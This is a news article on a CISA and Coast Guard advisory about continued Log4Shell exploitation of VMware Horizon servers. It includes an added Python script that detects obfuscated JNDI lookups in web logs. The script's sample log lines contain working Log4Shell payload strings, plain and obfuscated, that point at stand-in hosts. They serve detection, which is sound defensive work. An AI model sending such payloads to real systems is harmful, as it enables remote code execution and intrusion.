Hackers continue to exploit the Log4Shell vulnerability in VMware Horizon systems

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have announced, through a joint Cybersecurity Advisory (CSA), that the Log4Shell vulnerability (CVE-2021-44228) is still being exploited by threat actors.

Among the groups identified as still exploiting the vulnerability are advanced persistent threat (APT) actors, who were found to be targeting VMware Horizon and Unified Access Gateway (UAG) servers to gain access to organizations that had not applied the patches.

The CSA provides information, including tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs), derived from two related incident response engagements and from analysis of malware samples found on the affected networks.

Related article:
Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java services

For those unfamiliar with Log4Shell, it is a vulnerability that first came to light in December and targets a flaw in Apache Log4j, a popular logging framework for Java applications. It allows arbitrary code execution when a specially crafted value of the form "${jndi:URL}" is written to a log entry, because Log4j resolves the lookup and performs a JNDI request against that URL.

The vulnerability is notable because the attack works against any Java application that logs values obtained from external sources, for example by including a problematic value (such as a request header) in an error message.

Almost all projects that use frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink were reported to be affected, including Steam, Apple iCloud, and Minecraft clients and servers.
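As an added example (not code from the advisory, from CISA, or from VMware), the following Python script shows how to spot Log4Shell probes in web access logs. It reverses the URL-encoding and nested-lookup obfuscations ("${lower:...}", "${upper:...}", "${...:-default}") that attackers use to hide the literal "${jndi:" string, then reports the lookup scheme and the callback host so it can be blocked or hunted for. The log lines are constructed samples, and the addresses are documentation ranges, not real indicators.

```python
"""Detect Log4Shell-style JNDI lookups in log lines, seeing through the common
obfuscations. Added example; the sample log lines below are constructed."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no further "$", "{" or "}".
_LOOKUP = re.compile(r"\$\{([^{}$]*)\}")
# Final check once obfuscation is resolved: scheme and first path/host token.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/*([^/}\s]+)", re.IGNORECASE
)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j 2 would, for the handful of
    lookups attackers use to hide 'jndi'. A jndi lookup itself and any unknown
    lookup are left untouched: the goal is to see through obfuscation, not to
    emulate Log4j."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    # ${key:-default}: Log4j substitutes the default when the key resolves to
    # nothing, so ${::-j} and ${env:UNSET:-j} both collapse to "j".
    idx = body.find(":-")
    if idx != -1:
        return body[idx + 2:]
    return match.group(0)


def normalize(line, max_rounds=32):
    """Undo percent-encoding and nested lookups until the string is stable."""
    for _ in range(3):  # handle double-encoded payloads
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    for _ in range(max_rounds):
        new = _LOOKUP.sub(_resolve, line)
        if new == line:
            break
        line = new
    return line


def find_jndi(line):
    """Return (scheme, target) for the first JNDI lookup in the line, or None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def scan(lines):
    """Return (source_ip, scheme, target) for every line carrying a JNDI lookup.
    Assumes the source IP is the first whitespace-separated field, as in common
    access-log formats."""
    hits = []
    for line in lines:
        found = find_jndi(line)
        if found:
            hits.append((line.split(" ", 1)[0], found[0], found[1]))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://198.51.100.8/x} HTTP/1.1" 404',
    '10.0.0.8 - - "GET /portal/ HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/o}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.10%2Fprobe%7D"',
    '10.0.0.10 - - "GET /portal/ HTTP/1.1" 200 "-" "${env:HOSTNAME:-unknown}"',  # lookup, but no jndi
]

if __name__ == "__main__":
    for ip, scheme, target in scan(SAMPLE_LOG):
        print(f"{ip} sent a jndi:{scheme} lookup pointing at {target}")
```

Only the five obfuscations above are unwound, so a new trick would slip past the normalizer; the defensive point stands either way, since the fix is patching Log4j (or the Horizon/UAG builds that bundle it), and this scan is for finding who was probed, not for blocking.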

The full advisory details several recent cases in which intruders successfully exploited the vulnerability to gain access. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the affected network.

A threat hunt conducted by the US Coast Guard Cyber Command found that the threat actors used Log4Shell to gain initial access to the network of an unnamed victim. They then uploaded a malware file, "hmsvc.exe", which masquerades as the Microsoft Windows Sysinternals LogonSessions security tool.

The malware executable contains a range of capabilities, including keystroke logging and execution of additional payloads, and provides a graphical user interface for accessing the affected Windows desktop. It can also act as a command-and-control tunneling proxy, allowing a remote operator to pivot further into the network, the agencies said.

The analysis also found that hmsvc.exe was running as the local SYSTEM account, with the highest level of privileges, but did not reveal how the attackers escalated their privileges to that point.

CISA and the Coast Guard recommend that all organizations install the updates so that affected VMware Horizon and UAG systems run the latest version.

The advisory adds that organizations should keep their software up to date and prioritize patching known exploited vulnerabilities. The Internet-facing attack surface should be reduced by hosting essential services in a demilitarized zone (DMZ).

"Based on the number of Horizon servers in our data that are unpatched (only 18 percent were patched as of last Friday night), there is a high risk that this will seriously affect hundreds, if not thousands, of businesses. This weekend is also the first time we have seen evidence of mass exploitation, from initial access to the start of the next stage of action on Horizon servers."

It also calls for strict access controls on the network perimeter and for not hosting Internet-facing services that are not essential to business operations.

CISA and CGCYBER urge users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not applied immediately after VMware released its updates for Log4Shell, treat all affected VMware systems as compromised. See the CSA "Malicious Cyber Actors Continue to Exploit Log4Shell on VMware Horizon Systems" for more information and additional recommendations.

Finally, if you are interested in learning more, you can check the details at the following link.

